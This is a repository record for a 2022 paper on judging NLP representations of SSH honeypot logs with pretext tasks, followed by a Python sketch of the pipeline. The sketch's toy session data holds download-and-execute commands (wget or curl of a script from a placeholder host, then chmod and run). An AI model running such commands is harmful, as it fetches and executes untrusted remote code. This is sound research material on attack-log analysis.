On using pretext tasks to learn representations from network logs / Boffa, M.; Vassio, L.; Mellia, M.; Drago, I.; Milan, G.; Houidi, Z. B.; Rossi, D. - Print. - (2022), pp. 21-26. (Paper presented at NativeNi '22: 1st International Workshop on Native Network Intelligence, held in Rome, Italy, on 9 December 2022) [10.1145/3565009.3569522].
On using pretext tasks to learn representations from network logs
Boffa M.; Vassio L.; Mellia M.; Drago I.; Milan G.
2022
Abstract
Learning meaningful representations from network data is critical to ease the adoption of AI as a cornerstone for processing network logs. Since a large portion of such data is textual, Natural Language Processing (NLP) is an obvious candidate for learning its representations. Indeed, the literature proposes impressive applications of NLP to textual network data. However, in the absence of labels, objectively evaluating the quality of the learned representations is still an open problem. We call for a systematic adoption of domain-specific pretext tasks to select the best representation from network data. Relying on such tasks enables us to evaluate different representations on side machine learning problems and, ultimately, to unveil the best candidate representations for the more interesting downstream tasks for which labels are scarce or unavailable. We apply pretext tasks to the analysis of logs collected from SSH honeypots. Here, a cumbersome downstream task is to cluster events that exhibit a similar attack pattern. We propose the following pipeline: first, we represent the input data using a classic NLP-based approach. Then, we design pretext tasks to objectively evaluate the quality of each representation and to select the best one. Finally, we use the best representation to solve the unsupervised task, which uncovers interesting behaviours and attack patterns. All in all, our proposal can be generalized to other text-based network logs beyond honeypots.

File | Access | Type | License | Size | Format
---|---|---|---|---|---
2022_pretext_NATIVENI_published.pdf | Open access | 2a Post-print, publisher's version / Version of Record | Public - All rights reserved | 1.17 MB | Adobe PDF
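The three-step pipeline outlined in the abstract (represent, evaluate on a pretext task, then cluster) can be illustrated with a minimal sketch. This is not the authors' implementation. The toy sessions, the `client_A`/`client_B` metadata labels used as the pretext target, the two bag-of-tokens representations, the leave-one-out nearest-neighbour score, and the greedy clustering are all assumptions chosen so the example runs with the Python standard library alone.

```python
from collections import Counter
from math import sqrt

# Hypothetical toy data: (commands typed in one SSH session, metadata label).
# The label stands in for any attribute that comes for free with the log
# and can therefore serve as a pretext target.
SESSIONS = [
    ("wget http://h/a.sh ; chmod +x a.sh ; ./a.sh", "client_A"),
    ("wget http://h/b.sh ; chmod +x b.sh ; ./b.sh", "client_A"),
    ("curl -O http://h/c.sh ; chmod +x c.sh ; ./c.sh", "client_A"),
    ("uname -a ; cat /proc/cpuinfo ; free -m", "client_B"),
    ("uname -a ; cat /proc/cpuinfo ; nproc", "client_B"),
    ("cat /proc/cpuinfo ; free -m ; w", "client_B"),
]

# Step 1: two candidate representations (simple stand-ins for NLP embeddings).
def word_counts(text):
    return Counter(text.split())

def char_trigrams(text):
    return Counter(text[i:i + 3] for i in range(len(text) - 2))

def cosine(a, b):
    dot = sum(a[k] * b[k] for k in a if k in b)
    norm = sqrt(sum(v * v for v in a.values())) * sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

# Step 2: pretext task. Score a representation by leave-one-out
# 1-nearest-neighbour accuracy on the freely available labels.
def pretext_score(vectors, labels):
    hits = 0
    for i, v in enumerate(vectors):
        nearest = max((j for j in range(len(vectors)) if j != i),
                      key=lambda j: cosine(v, vectors[j]))
        hits += labels[nearest] == labels[i]
    return hits / len(vectors)

# Step 3: downstream unsupervised task. Greedy clustering: a session joins
# the first cluster whose seed is similar enough, else it starts a new one.
def greedy_clusters(vectors, threshold=0.5):
    seeds, assignment = [], []
    for v in vectors:
        for cid, seed in enumerate(seeds):
            if cosine(v, seed) >= threshold:
                assignment.append(cid)
                break
        else:
            seeds.append(v)
            assignment.append(len(seeds) - 1)
    return assignment

texts = [t for t, _ in SESSIONS]
labels = [l for _, l in SESSIONS]
candidates = {"word_counts": word_counts, "char_trigrams": char_trigrams}
scores = {name: pretext_score([f(t) for t in texts], labels)
          for name, f in candidates.items()}
best = max(scores, key=scores.get)  # representation selected by the pretext task
clusters = greedy_clusters([candidates[best](t) for t in texts])
print(scores, best, clusters)
```

The point of the sketch is the selection step: the pretext labels are never used for clustering, only to rank the candidate representations before the unsupervised task is run.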
Documents in IRIS are protected by copyright and all rights are reserved, unless otherwise indicated.
https://hdl.handle.net/11583/2976474